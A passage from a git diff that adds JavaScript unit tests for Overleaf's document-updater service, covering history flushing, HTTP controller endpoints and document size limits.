sinon.stub() + this.HistoryManager.shouldFlushHistoryOps + .withArgs(this.project_ops_length) + .returns(true) + + this.HistoryManager.recordAndFlushHistoryOps( + this.project_id, + this.ops, + this.project_ops_length + ) + }) + + it('should flush project changes', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('with enough ops to flush doc changes', function () { + beforeEach(function () { + this.HistoryManager.shouldFlushHistoryOps = sinon.stub() + this.HistoryManager.shouldFlushHistoryOps + .withArgs(this.project_ops_length) + .returns(false) + + this.HistoryManager.recordAndFlushHistoryOps( + this.project_id, + this.ops, + this.project_ops_length + ) + }) + + it('should not flush project changes', function () { + this.HistoryManager.flushProjectChangesAsync.called.should.equal(false) + }) + }) + + describe('shouldFlushHistoryOps', function () { + it('should return false if the number of ops is not known', function () { + this.HistoryManager.shouldFlushHistoryOps( + null, + ['a', 'b', 'c'].length, + 1 + ).should.equal(false) + }) + + it("should return false if the updates didn't take us past the threshold", function () { + // Currently there are 14 ops + // Previously we were on 11 ops + // We didn't pass over a multiple of 5 + this.HistoryManager.shouldFlushHistoryOps( + 14, + ['a', 'b', 'c'].length, + 5 + ).should.equal(false) + + it('should return true if the updates took to the threshold', function () {}) + // Currently there are 15 ops + // Previously we were on 12 ops + // We've reached a new multiple of 5 + this.HistoryManager.shouldFlushHistoryOps( + 15, + ['a', 'b', 'c'].length, + 5 + ).should.equal(true) + }) + + it('should return true if the updates took past the threshold', function () { + // Currently there are 19 ops + // Previously we were on 16 ops + // We didn't pass over a multiple of 5 + this.HistoryManager.shouldFlushHistoryOps( + 17, + ['a', 'b', 'c'].length, + 5 + ).should.equal(true) + }) + }) + }) + + describe('resyncProjectHistory', function () { + beforeEach(function () { + this.projectHistoryId = 'history-id-1234' + this.docs = [ + { + doc: this.doc_id, + path: 'main.tex', + }, + ] + this.files = [ + { + file: 'mock-file-id', + path: 'universe.png', + url: `www.filestore.test/${this.project_id}/mock-file-id`, + }, + ] + this.ProjectHistoryRedisManager.queueResyncProjectStructure = sinon + .stub() + .yields() + this.DocumentManager.resyncDocContentsWithLock = sinon.stub().yields() + }) + + describe('full sync', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + {}, + this.callback + ) + }) + + it('should queue a project structure reync', function () { + this.ProjectHistoryRedisManager.queueResyncProjectStructure + .calledWith( + this.project_id, + this.projectHistoryId, + this.docs, + this.files + ) + .should.equal(true) + }) + + it('should queue doc content reyncs', function () { + this.DocumentManager.resyncDocContentsWithLock + .calledWith(this.project_id, this.docs[0].doc, this.docs[0].path) + .should.equal(true) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + + describe('resyncProjectStructureOnly=true', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + { resyncProjectStructureOnly: true }, + this.callback + ) + }) + + it('should queue a project structure reync', function () { + this.ProjectHistoryRedisManager.queueResyncProjectStructure + .calledWith( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + { resyncProjectStructureOnly: true } + ) + .should.equal(true) + }) + + it('should not queue doc content reyncs', function () { + this.DocumentManager.resyncDocContentsWithLock.called.should.equal( + false + ) + }) + + it('should call the callback', function () { + this.callback.called.should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/HttpController/HttpControllerTests.js b/services/document-updater/test/unit/js/HttpController/HttpControllerTests.js new file mode 100644 index 0000000..2b8d288 --- /dev/null +++ b/services/document-updater/test/unit/js/HttpController/HttpControllerTests.js @@ -0,0 +1,1258 @@ +const sinon = require('sinon') +const modulePath = '../../../../app/js/HttpController.js' +const SandboxedModule = require('sandboxed-module') +const Errors = require('../../../../app/js/Errors.js') + +describe('HttpController', function () { + beforeEach(function () { + this.HttpController = SandboxedModule.require(modulePath, { + requires: { + './DocumentManager': (this.DocumentManager = {}), + './HistoryManager': (this.HistoryManager = { + flushProjectChangesAsync: sinon.stub(), + }), + './ProjectHistoryRedisManager': (this.ProjectHistoryRedisManager = {}), + './ProjectManager': (this.ProjectManager = {}), + './DeleteQueueManager': (this.DeleteQueueManager = {}), + './RedisManager': (this.RedisManager = { + DOC_OPS_TTL: 42, + }), + './Metrics': (this.Metrics = {}), + './Errors': Errors, + '@overleaf/settings': { max_doc_length: 2 * 1024 * 1024 }, + }, + }) + this.Metrics.Timer = class Timer {} + this.Metrics.Timer.prototype.done = sinon.stub() + + this.project_id = 'project-id-123' + this.doc_id = 'doc-id-123' + this.source = 'editor' + this.next = sinon.stub() + this.res = { + send: sinon.stub(), + sendStatus: sinon.stub(), + json: sinon.stub(), + } + }) + + describe('getDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.ops = ['mock-op-1', 'mock-op-2'] + this.version = 42 + this.fromVersion = 42 + this.ranges = { changes: 'mock', comments: 'mock' } + this.pathname = '/a/b/c' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: {}, + } + }) + + describe('when the document exists and no recent ops are requested', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith( + 3, + null, + this.lines, + this.version, + [], + this.ranges, + this.pathname + ) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should get the doc', function () { + this.DocumentManager.getDocAndRecentOpsWithLock + .calledWith(this.project_id, this.doc_id, -1) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith({ + id: this.doc_id, + lines: this.lines, + version: this.version, + ops: [], + ranges: this.ranges, + pathname: this.pathname, + ttlInS: 42, + }) + .should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'getting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when recent ops are requested', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith( + 3, + null, + this.lines, + this.version, + this.ops, + this.ranges, + this.pathname + ) + this.req.query = { fromVersion: `${this.fromVersion}` } + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should get the doc', function () { + this.DocumentManager.getDocAndRecentOpsWithLock + .calledWith(this.project_id, this.doc_id, this.fromVersion) + .should.equal(true) + }) + + it('should return the doc as JSON', function () { + this.res.json + .calledWith({ + id: this.doc_id, + lines: this.lines, + version: this.version, + ops: this.ops, + ranges: this.ranges, + pathname: this.pathname, + ttlInS: 42, + }) + .should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'getting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when the document does not exist', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith(3, null, null, null) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should call next with NotFoundError', function () { + this.next + .calledWith(sinon.match.instanceOf(Errors.NotFoundError)) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.getDocAndRecentOpsWithLock = sinon + .stub() + .callsArgWith(3, new Error('oops'), null, null) + this.HttpController.getDoc(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('getComment', function () { + beforeEach(function () { + this.ranges = { + changes: 'mock', + comments: [ + { + id: 'comment-id-1', + }, + { + id: 'comment-id-2', + }, + ], + } + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: this.comment_id, + }, + query: {}, + body: {}, + } + }) + + beforeEach(function () { + this.DocumentManager.getCommentWithLock = sinon + .stub() + .callsArgWith(3, null, this.ranges.comments[0]) + this.HttpController.getComment(this.req, this.res, this.next) + }) + + it('should get the comment', function () { + this.DocumentManager.getCommentWithLock + .calledWith(this.project_id, this.doc_id, this.comment_id) + .should.equal(true) + }) + + it('should return the comment as JSON', function () { + this.res.json + .calledWith({ + id: 'comment-id-1', + }) + .should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'getting comment via http' + ) + .should.equal(true) + }) + }) + + describe('setDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.source = 'dropbox' + this.user_id = 'user-id-123' + this.req = { + headers: {}, + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: { + lines: this.lines, + source: this.source, + user_id: this.user_id, + undoing: (this.undoing = true), + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.setDocWithLock = sinon + .stub() + .callsArgWith(7, null, { rev: '123' }) + this.HttpController.setDoc(this.req, this.res, this.next) + }) + + it('should set the doc', function () { + this.DocumentManager.setDocWithLock + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id, + this.undoing, + true + ) + .should.equal(true) + }) + + it('should return a json response with the document rev from web', function () { + this.res.json.calledWithMatch({ rev: '123' }).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + docId: this.doc_id, + projectId: this.project_id, + lines: this.lines, + source: this.source, + userId: this.user_id, + undoing: this.undoing, + }, + 'setting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.setDocWithLock = sinon + .stub() + .callsArgWith(7, new Error('oops')) + this.HttpController.setDoc(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + + describe('when the payload is too large', function () { + beforeEach(function () { + const lines = [] + for (let _ = 0; _ <= 200000; _++) { + lines.push('test test test') + } + this.req.body.lines = lines + this.DocumentManager.setDocWithLock = sinon.stub().callsArgWith(6) + this.HttpController.setDoc(this.req, this.res, this.next) + }) + + it('should send back a 406 response', function () { + this.res.sendStatus.calledWith(406).should.equal(true) + }) + + it('should not call setDocWithLock', function () { + this.DocumentManager.setDocWithLock.callCount.should.equal(0) + }) + }) + }) + + describe('flushProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.flushProjectWithLocks = sinon.stub().callsArgWith(1) + this.HttpController.flushProject(this.req, this.res, this.next) + }) + + it('should flush the project', function () { + this.ProjectManager.flushProjectWithLocks + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id }, + 'flushing project via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.ProjectManager.flushProjectWithLocks = sinon + .stub() + .callsArgWith(1, new Error('oops')) + this.HttpController.flushProject(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('flushDocIfLoaded', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.flushDocIfLoadedWithLock = sinon + .stub() + .callsArgWith(2) + this.HttpController.flushDocIfLoaded(this.req, this.res, this.next) + }) + + it('should flush the doc', function () { + this.DocumentManager.flushDocIfLoadedWithLock + .calledWith(this.project_id, this.doc_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'flushing doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.flushDocIfLoadedWithLock = sinon + .stub() + .callsArgWith(2, new Error('oops')) + this.HttpController.flushDocIfLoaded(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('deleteDoc', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.flushAndDeleteDocWithLock = sinon + .stub() + .callsArgWith(3) + this.HttpController.deleteDoc(this.req, this.res, this.next) + }) + + it('should flush and delete the doc', function () { + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, this.doc_id, { + ignoreFlushErrors: false, + }) + .should.equal(true) + }) + + it('should flush project history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { docId: this.doc_id, projectId: this.project_id }, + 'deleting doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('ignoring errors', function () { + beforeEach(function () { + this.req.query.ignore_flush_errors = 'true' + this.DocumentManager.flushAndDeleteDocWithLock = sinon.stub().yields() + this.HttpController.deleteDoc(this.req, this.res, this.next) + }) + + it('should delete the doc', function () { + this.DocumentManager.flushAndDeleteDocWithLock + .calledWith(this.project_id, this.doc_id, { ignoreFlushErrors: true }) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.flushAndDeleteDocWithLock = sinon + .stub() + .callsArgWith(3, new Error('oops')) + this.HttpController.deleteDoc(this.req, this.res, this.next) + }) + + it('should flush project history', function () { + this.HistoryManager.flushProjectChangesAsync + .calledWithExactly(this.project_id) + .should.equal(true) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('deleteProject', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + }, + query: {}, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.flushAndDeleteProjectWithLocks = sinon + .stub() + .callsArgWith(2) + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should delete the project', function () { + this.ProjectManager.flushAndDeleteProjectWithLocks + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id }, + 'deleting project via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('with the background=true option from realtime', function () { + beforeEach(function () { + this.ProjectManager.queueFlushAndDeleteProject = sinon + .stub() + .callsArgWith(1) + this.req.query = { background: true, shutdown: true } + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should queue the flush and delete', function () { + this.ProjectManager.queueFlushAndDeleteProject + .calledWith(this.project_id) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.ProjectManager.flushAndDeleteProjectWithLocks = sinon + .stub() + .callsArgWith(2, new Error('oops')) + this.HttpController.deleteProject(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('acceptChanges', function () { + beforeEach(function () { + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + change_id: (this.change_id = 'mock-change-od-1'), + }, + query: {}, + body: {}, + } + }) + + describe('successfully with a single change', function () { + beforeEach(function () { + this.DocumentManager.acceptChangesWithLock = sinon + .stub() + .callsArgWith(3) + this.HttpController.acceptChanges(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.acceptChangesWithLock + .calledWith(this.project_id, this.doc_id, [this.change_id]) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, docId: this.doc_id }, + 'accepting 1 changes via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('succesfully with with multiple changes', function () { + beforeEach(function () { + this.change_ids = [ + 'mock-change-od-1', + 'mock-change-od-2', + 'mock-change-od-3', + 'mock-change-od-4', + ] + this.req.body = { change_ids: this.change_ids } + this.DocumentManager.acceptChangesWithLock = sinon + .stub() + .callsArgWith(3) + this.HttpController.acceptChanges(this.req, this.res, this.next) + }) + + it('should accept the changes in the body payload', function () { + this.DocumentManager.acceptChangesWithLock + .calledWith(this.project_id, this.doc_id, this.change_ids) + .should.equal(true) + }) + + it('should log the request with the correct number of changes', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, docId: this.doc_id }, + `accepting ${this.change_ids.length} changes via http` + ) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.acceptChangesWithLock = sinon + .stub() + .callsArgWith(3, new Error('oops')) + this.HttpController.acceptChanges(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('resolveComment', function () { + beforeEach(function () { + this.user_id = 'user-id-123' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: (this.comment_id = 'mock-comment-id'), + }, + query: {}, + body: { + user_id: this.user_id, + }, + } + this.resolved = true + }) + + describe('successfully', function () { + beforeEach(function (done) { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5) + + this.ProjectHistoryRedisManager.queueOps = sinon.stub() + this.res.sendStatus.callsFake(() => done()) + this.HttpController.resolveComment(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.updateCommentStateWithLock + .calledWith( + this.project_id, + this.doc_id, + this.comment_id, + this.user_id, + this.resolved + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'resolving comment via http' + ) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.resolveComment(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('reopenComment', function () { + beforeEach(function () { + this.user_id = 'user-id-123' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: (this.comment_id = 'mock-comment-id'), + }, + query: {}, + body: { + user_id: this.user_id, + }, + } + this.resolved = false + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5) + + this.ProjectHistoryRedisManager.queueOps = sinon.stub() + this.HttpController.reopenComment(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.updateCommentStateWithLock + .calledWith( + this.project_id, + this.doc_id, + this.comment_id, + this.user_id, + this.resolved + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'reopening comment via http' + ) + .should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.updateCommentStateWithLock = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.reopenComment(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('deleteComment', function () { + beforeEach(function () { + this.user_id = 'user-id-123' + this.req = { + params: { + project_id: this.project_id, + doc_id: this.doc_id, + comment_id: (this.comment_id = 'mock-comment-id'), + }, + query: {}, + body: { + user_id: this.user_id, + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.deleteCommentWithLock = sinon + .stub() + .callsArgWith(4) + + this.ProjectHistoryRedisManager.queueOps = sinon.stub() + this.HttpController.deleteComment(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.DocumentManager.deleteCommentWithLock + .calledWith( + this.project_id, + this.doc_id, + this.comment_id, + this.user_id + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + projectId: this.project_id, + docId: this.doc_id, + commentId: this.comment_id, + }, + 'deleting comment via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.deleteCommentWithLock = sinon + .stub() + .callsArgWith(4, new Error('oops')) + this.HttpController.deleteComment(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('getProjectDocsAndFlushIfOld', function () { + beforeEach(function () { + this.state = '01234567890abcdef' + this.docs = [ + { _id: '1234', lines: 'hello', v: 23 }, + { _id: '4567', lines: 'world', v: 45 }, + ] + this.req = { + params: { + project_id: this.project_id, + }, + query: { + state: this.state, + }, + body: {}, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.getProjectDocsAndFlushIfOld = sinon + .stub() + .callsArgWith(3, null, this.docs) + this.HttpController.getProjectDocsAndFlushIfOld( + this.req, + this.res, + this.next + ) + }) + + it('should get docs from the project manager', function () { + this.ProjectManager.getProjectDocsAndFlushIfOld + .calledWith(this.project_id, this.state, {}) + .should.equal(true) + }) + + it('should return a successful response', function () { + this.res.send.calledWith(this.docs).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, exclude: [] }, + 'getting docs via http' + ) + .should.equal(true) + }) + + it('should log the response', function () { + this.logger.debug + .calledWith( + { projectId: this.project_id, result: ['1234:23', '4567:45'] }, + 'got docs via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when there is a conflict', function () { + beforeEach(function () { + this.ProjectManager.getProjectDocsAndFlushIfOld = sinon + .stub() + .callsArgWith( + 3, + new Errors.ProjectStateChangedError('project state changed') + ) + this.HttpController.getProjectDocsAndFlushIfOld( + this.req, + this.res, + this.next + ) + }) + + it('should return an HTTP 409 Conflict response', function () { + this.res.sendStatus.calledWith(409).should.equal(true) + }) + }) + + describe('when an error occurs', function () { + beforeEach(function () { + this.ProjectManager.getProjectDocsAndFlushIfOld = sinon + .stub() + .callsArgWith(3, new Error('oops')) + this.HttpController.getProjectDocsAndFlushIfOld( + this.req, + this.res, + this.next + ) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('updateProject', function () { + beforeEach(function () { + this.projectHistoryId = 'history-id-123' + this.userId = 'user-id-123' + this.updates = [ + { + type: 'rename-doc', + id: 1, + pathname: 'thesis.tex', + newPathname: 'book.tex', + }, + { type: 'add-doc', id: 2, pathname: 'article.tex', docLines: 'hello' }, + { + type: 'rename-file', + id: 3, + pathname: 'apple.png', + newPathname: 'banana.png', + }, + { type: 'add-file', id: 4, url: 'filestore.example.com/4' }, + ] + this.version = 1234567 + this.req = { + query: {}, + body: { + projectHistoryId: this.projectHistoryId, + userId: this.userId, + updates: this.updates, + version: this.version, + source: this.source, + }, + params: { + project_id: this.project_id, + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks = sinon.stub().yields() + this.HttpController.updateProject(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.ProjectManager.updateProjectWithLocks + .calledWith( + this.project_id, + this.projectHistoryId, + this.userId, + this.updates, + this.version, + this.source + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.calledWith(204).should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.ProjectManager.updateProjectWithLocks = sinon + .stub() + .yields(new Error('oops')) + this.HttpController.updateProject(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('resyncProjectHistory', function () { + beforeEach(function () { + this.projectHistoryId = 'history-id-123' + this.docs = sinon.stub() + this.files = sinon.stub() + this.fileUpdates = sinon.stub() + this.req = { + query: {}, + body: { + projectHistoryId: this.projectHistoryId, + docs: this.docs, + files: this.files, + }, + params: { + project_id: this.project_id, + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory = sinon.stub().callsArgWith(5) + this.HttpController.resyncProjectHistory(this.req, this.res, this.next) + }) + + it('should accept the change', function () { + this.HistoryManager.resyncProjectHistory + .calledWith( + this.project_id, + this.projectHistoryId, + this.docs, + this.files, + {} + ) + .should.equal(true) + }) + + it('should return a successful No Content response', function () { + this.res.sendStatus.should.have.been.calledWith(204) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.HistoryManager.resyncProjectHistory = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.resyncProjectHistory(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + }) + + describe('appendToDoc', function () { + beforeEach(function () { + this.lines = ['one', 'two', 'three'] + this.source = 'dropbox' + this.user_id = 'user-id-123' + this.req = { + headers: {}, + params: { + project_id: this.project_id, + doc_id: this.doc_id, + }, + query: {}, + body: { + lines: this.lines, + source: this.source, + user_id: this.user_id, + undoing: (this.undoing = true), + }, + } + }) + + describe('successfully', function () { + beforeEach(function () { + this.DocumentManager.appendToDocWithLock = sinon + .stub() + .callsArgWith(5, null, { rev: '123' }) + this.HttpController.appendToDoc(this.req, this.res, this.next) + }) + + it('should append to the doc', function () { + this.DocumentManager.appendToDocWithLock + .calledWith( + this.project_id, + this.doc_id, + this.lines, + this.source, + this.user_id + ) + .should.equal(true) + }) + + it('should return a json response with the document rev from web', function () { + this.res.json.calledWithMatch({ rev: '123' }).should.equal(true) + }) + + it('should log the request', function () { + this.logger.debug + .calledWith( + { + docId: this.doc_id, + projectId: this.project_id, + lines: this.lines, + source: this.source, + userId: this.user_id, + }, + 'appending to doc via http' + ) + .should.equal(true) + }) + + it('should time the request', function () { + this.Metrics.Timer.prototype.done.called.should.equal(true) + }) + }) + + describe('when an errors occurs', function () { + beforeEach(function () { + this.DocumentManager.appendToDocWithLock = sinon + .stub() + .callsArgWith(5, new Error('oops')) + this.HttpController.appendToDoc(this.req, this.res, this.next) + }) + + it('should call next with the error', function () { + this.next.calledWith(sinon.match.instanceOf(Error)).should.equal(true) + }) + }) + + describe('when the payload is too large', function () { + beforeEach(function () { + this.DocumentManager.appendToDocWithLock = sinon + .stub() + .callsArgWith(5, new Errors.FileTooLargeError()) + this.HttpController.appendToDoc(this.req, this.res, this.next) + }) + + it('should send back a 422 response', function () { + this.res.sendStatus.calledWith(422).should.equal(true) + }) + }) + }) +}) diff --git a/services/document-updater/test/unit/js/Limits/LimitsTests.js b/services/document-updater/test/unit/js/Limits/LimitsTests.js new file mode 100644 index 0000000..34a5c13 --- /dev/null +++ b/services/document-updater/test/unit/js/Limits/LimitsTests.js @@ -0,0 +1,84 @@ +const { expect } = require('chai') +const modulePath = '../../../../app/js/Limits.js' +const SandboxedModule = require('sandboxed-module') + +describe('Limits', function () { + beforeEach(function () { + return (this.Limits = SandboxedModule.require(modulePath)) + }) + + describe('getTotalSizeOfLines', function () { + it('should compute the character count for a document with multiple lines', function () { + const count = this.Limits.getTotalSizeOfLines(['123', '4567']) + expect(count).to.equal(9) + }) + + it('should compute the character count for a document with a single line', function () { + const count = this.Limits.getTotalSizeOfLines(['123']) + expect(count).to.equal(4) + }) + + it('should compute the character count for an empty document', function () { + const count = this.Limits.getTotalSizeOfLines([]) + expect(count).to.equal(0) + }) + }) + + describe('docIsTooLarge', function () { + describe('when the estimated size is below the limit', function () { + it('should return false when the estimated size is below the limit', function () { + const result = this.Limits.docIsTooLarge(128, ['hello', 'world'], 1024) + expect(result).to.be.false + }) + }) + + describe('when the estimated size is at the limit', function () { + it('should return false when the estimated size is at the limit', function () { + const result = this.Limits.docIsTooLarge(1024, ['hello', 'world'], 1024) + expect(result).to.be.false + }) + }) + + describe('when the estimated size is above the limit', function () { + it('should return false when the actual character count is below the limit', function () { + const result = this.Limits.docIsTooLarge(2048, ['hello', 'world'], 1024) + expect(result).to.be.false + }) + + it('should return false when the actual character count is at the limit', function () { + const result = this.Limits.docIsTooLarge(2048, 